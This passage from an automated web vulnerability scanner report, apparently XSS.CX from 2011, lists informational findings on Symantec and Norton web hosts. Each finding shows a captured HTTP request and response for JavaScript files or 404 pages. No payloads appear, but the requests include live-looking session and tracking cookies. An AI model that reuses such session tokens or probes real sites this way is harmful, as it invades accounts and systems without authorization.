Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819

r

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Fri, 09 Sep 2011 21:26:11 GMT
Content-Length: 2
Connection: close
Expires: Fri, 09 Sep 2011 21:26:10 GMT
Cache-Control: no-cache

OK

24.6. https://renewals.symantec.com/renewals/js/InstantInvite3.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://renewals.symantec.com
Path:	/renewals/js/InstantInvite3.js

Request

GET /renewals/js/InstantInvite3.js HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:36 GMT
Content-Length: 34318
Last-Modified: Thu, 18 Mar 2010 01:42:34 GMT
Accept-Ranges: bytes

/* Copyright (C) InstantService, Inc. All rights reserved.
* All content is protected under U.S. copyright laws. Any unauthorized duplication, modification,
* or reverse-engineering of this code with
...[SNIP]...

24.7. https://renewals.symantec.com/renewals/js/commonFunctions.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://renewals.symantec.com
Path:	/renewals/js/commonFunctions.js

Request

GET /renewals/js/commonFunctions.js HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:36 GMT
Content-Length: 5510
Last-Modified: Thu, 18 Mar 2010 01:42:34 GMT
Accept-Ranges: bytes

// $Id: commonFunctions.js 82 2008-01-30 00:07:20Z mhallesy $
///////////////////////////////////////////
//commonFunctions.js
//maintained by stuller
//last updated 1/18/2006
//see Confluence fo
...[SNIP]...

24.8. https://renewals.symantec.com/renewals/js/commonValidation2-9-06.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://renewals.symantec.com
Path:	/renewals/js/commonValidation2-9-06.js

Request

Response

24.9. https://renewals.symantec.com/renewals/js/dhtmlwindow.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://renewals.symantec.com
Path:	/renewals/js/dhtmlwindow.js

Request

GET /renewals/js/dhtmlwindow.js HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:34 GMT
Content-Length: 19028
Last-Modified: Wed, 02 Jun 2010 23:07:30 GMT
Accept-Ranges: bytes

// -------------------------------------------------------------------
// DHTML Window Widget- By Dynamic Drive, available at: http://www.dynamicdrive.com
// v1.0: Script created Feb 15th, 07'
// v
...[SNIP]...

24.10. https://renewals.symantec.com/renewals/js/getPageNames.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://renewals.symantec.com
Path:	/renewals/js/getPageNames.js

Request

GET /renewals/js/getPageNames.js HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:36 GMT
Content-Length: 3087
Last-Modified: Wed, 12 May 2010 17:24:52 GMT
Accept-Ranges: bytes

// $Id: getPageNames.js 1694 2009-04-09 01:56:00Z mhallesy $

function pageNamesLookup(chanName) {
   this.stSrch = "/renewals/";
   this.nameLookup = new Array();

   this.nameLookup["chat_form.jsp"]
...[SNIP]...

24.11. https://renewals.symantec.com/renewals/js/modal.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://renewals.symantec.com
Path:	/renewals/js/modal.js

Request

GET /renewals/js/modal.js HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:35 GMT
Content-Length: 3362
Last-Modified: Thu, 20 May 2010 22:54:24 GMT
Accept-Ranges: bytes

// -------------------------------------------------------------------
// DHTML Modal window- By Dynamic Drive, available at: http://www.dynamicdrive.com
// v1.0: Script created Feb 27th, 07'
// v1
...[SNIP]...

24.12. https://renewals.symantec.com/renewals/js/mySymantecDevKit.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://renewals.symantec.com
Path:	/renewals/js/mySymantecDevKit.js

Request

GET /renewals/js/mySymantecDevKit.js HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:37 GMT
Content-Length: 10076
Last-Modified: Mon, 13 Sep 2010 21:57:06 GMT
Accept-Ranges: bytes

function showHelp(thisitem){var divname="help"+thisitem;var thediv=document.getElementById(divname);thediv.style.visibility='visible';}
function hideHelp(thisitem){var divname="help"+thisitem;var the
...[SNIP]...

24.13. https://renewals.symantec.com/renewals/js/s_2_code_symc_cust_prod.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://renewals.symantec.com
Path:	/renewals/js/s_2_code_symc_cust_prod.js

Request

GET /renewals/js/s_2_code_symc_cust_prod.js HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:36 GMT
Content-Length: 28910
Last-Modified: Wed, 28 Apr 2010 02:37:02 GMT
Accept-Ranges: bytes

/* SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com */
/************************ ADDITIONAL FEATURES *************
...[SNIP]...

24.14. https://renewals.symantec.com/renewals/js/symantec_omniture/mysymc_code_util.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://renewals.symantec.com
Path:	/renewals/js/symantec_omniture/mysymc_code_util.js

Request

GET /renewals/js/symantec_omniture/mysymc_code_util.js HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:36 GMT
Content-Length: 8321
Last-Modified: Thu, 18 Mar 2010 01:42:32 GMT
Accept-Ranges: bytes

var countryDetails=new Array();var language=new Array();var RegionArray=new Array();var questionSet="";var pageNumber=0;var samChannel=null;var jsChannel=null;var tabNames=new Array();var subTabName
...[SNIP]...

24.15. https://renewals.symantec.com/renewals/js/symantec_omniture/s_code_20100217.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://renewals.symantec.com
Path:	/renewals/js/symantec_omniture/s_code_20100217.js

Request

Response

24.16. http://us.norton.com/www-uat.ges.sym previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://us.norton.com
Path:	/www-uat.ges.sym

Request

GET /www-uat.ges.sym HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
Content-Length: 22137
Cache-Control: public, max-age=21587
Date: Fri, 09 Sep 2011 21:47:29 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Error: Page Not Found - Symantec Corp.</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta http-equiv="Content-Language" content="en-US"/>
...[SNIP]...

24.17. https://www-secure.symantec.com/content/en/us/enterprise/images/liveperson/invite10/close_on.gif/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www-secure.symantec.com
Path:	/content/en/us/enterprise/images/liveperson/invite10/close_on.gif/

Request

GET /content/en/us/enterprise/images/liveperson/invite10/close_on.gif/ HTTP/1.1
Host: www-secure.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
Content-Length: 22137
Cache-Control: public, max-age=1800
Date: Fri, 09 Sep 2011 21:47:33 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Error: Page Not Found - Symantec Corp.</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta http-equiv="Content-Language" content="en-US"/>
...[SNIP]...

24.18. https://www-secure.symantec.com/content/en/us/enterprise/images/liveperson/invite10/need_help_on.gif/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www-secure.symantec.com
Path:	/content/en/us/enterprise/images/liveperson/invite10/need_help_on.gif/

Request

GET /content/en/us/enterprise/images/liveperson/invite10/need_help_on.gif/ HTTP/1.1
Host: www-secure.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.19. http://www.symantec.com/business/verisign/fraud-detection-service previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.symantec.com
Path:	/business/verisign/fraud-detection-service

Request

Response

Report generated by XSS.CX at Sat Sep 10 00:40:28 GMT-06:00 2011.